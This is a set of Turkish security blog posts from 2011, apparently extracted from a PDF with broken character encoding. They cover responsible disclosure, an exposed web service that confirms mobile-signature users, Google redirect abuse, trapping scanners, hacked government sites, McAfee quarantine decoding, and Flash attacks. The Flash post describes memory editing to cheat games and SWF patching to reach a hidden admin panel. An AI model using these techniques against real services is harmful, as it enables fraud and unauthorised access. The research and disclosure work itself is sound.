bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam 